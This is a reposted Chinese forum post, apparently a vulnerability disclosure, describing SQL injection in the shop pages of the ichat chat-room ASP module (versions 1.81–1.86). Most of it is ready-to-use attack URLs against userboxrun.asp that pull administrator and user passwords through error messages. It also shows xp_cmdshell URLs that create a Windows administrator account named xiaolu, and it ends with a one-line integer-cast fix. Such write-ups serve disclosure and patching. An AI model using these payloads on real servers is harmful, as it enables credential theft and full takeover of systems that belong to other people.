发新话题
打印

[转载]ichat聊天室asp模块存在SQL注入漏洞和演示

[转载]ichat聊天室asp模块存在SQL注入漏洞和演示

信息来源:火龙网
文章作者:小路

涉及版本
ichat1.81
ichat1.85
ichat1.86

ichat聊天室是国内比较著名的聊天服务器软件,其中的百宝箱里面的userboxrun.asp,userboxsend1.asp等文件存在sql 注入漏洞,用户提交:
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1266 ;and (select top 1 username from admin)
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1266 ;and (select top 1 pass from admin)
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1266 ;and (select top 1 username from userinfo)
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1266 ;and (select top 1 userpassword from userinfo)
等一系列url能得到聊天室管理员用户名称和密码。
在没关闭详细错误显示的sql版服务器上提交:

http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1266 ;and (select top 1 username from admin)=5
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1266 ;and (select top 1 pass from admin)=5
类似url可以得到如下显示
引用:
Microsoft OLE DB Provider for SQL Server 错误 80040e07

将 varchar 值 admin 转换为数据类型为 int 的列时发生语法错误。

/shop/userboxrun.asp,行27

admin即为管理员名称

Microsoft OLE DB Provider for SQL Server 错误 80040e07

将 varchar 值 ichat 转换为数据类型为 int 的列时发生语法错误。

/shop/userboxrun.asp,行27
ichat即为管理员密码,具体过程不再详述。
最危险的是,在没删除xp_cmdshell储存过程的sql版服务器上,如果用于ichat连接数据库的sql用户是sa权限的,提交如下url:
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1266;exec master.dbo.xp_cmdshell "net user xiaolu xiaoxue /add";--
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1266;exec master.dbo.xp_cmdshell "net localgroup administrators xiaolu /add";--

可以添加用户名称为:xiaolu,密码为:xiaoxue的服务器管理员。
解决办法:
复制内容到剪贴板
代码:
wpid=request.querystring("wp")
wpid=replace(wpid,"","")
添加:
复制内容到剪贴板
代码:
wpid=cint(wpid)
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

发新话题